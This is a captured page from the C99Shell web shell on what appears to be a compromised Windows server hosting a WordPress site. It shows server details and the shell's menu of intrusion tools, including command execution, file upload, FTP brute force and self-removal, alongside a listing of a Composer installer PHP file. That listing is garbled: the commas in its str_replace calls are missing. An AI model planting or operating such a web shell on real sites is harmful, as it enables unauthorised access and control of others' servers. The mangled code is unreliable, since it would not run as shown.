!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\vendor\composer\installers\src\Composer\Installers\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     TYPO3FlowInstaller.php (1.19 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Composer\Installers;

/**
 * An installer to handle TYPO3 Flow specifics when installing packages.
 */
class TYPO3FlowInstaller extends BaseInstaller
{
    protected 
$locations = array(
        
'package'       => 'Packages/Application/{$name}/',
        
'framework'     => 'Packages/Framework/{$name}/',
        
'plugin'        => 'Packages/Plugins/{$name}/',
        
'site'          => 'Packages/Sites/{$name}/',
        
'boilerplate'   => 'Packages/Boilerplates/{$name}/',
        
'build'         => 'Build/{$name}/',
    );

    
/**
     * Modify the package name to be a TYPO3 Flow style key.
     *
     * @param  array $vars
     * @return array
     */
    
public function inflectPackageVars($vars)
    {
        
$autoload $this->package->getAutoload();
        if (isset(
$autoload['psr-0']) && is_array($autoload['psr-0'])) {
            
$namespace key($autoload['psr-0']);
            
$vars['name'] = str_replace('\\''.'$namespace);
        }
        if (isset(
$autoload['psr-4']) && is_array($autoload['psr-4'])) {
            
$namespace key($autoload['psr-4']);
            
$vars['name'] = rtrim(str_replace('\\''.'$namespace), '.');
        }

        return 
$vars;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--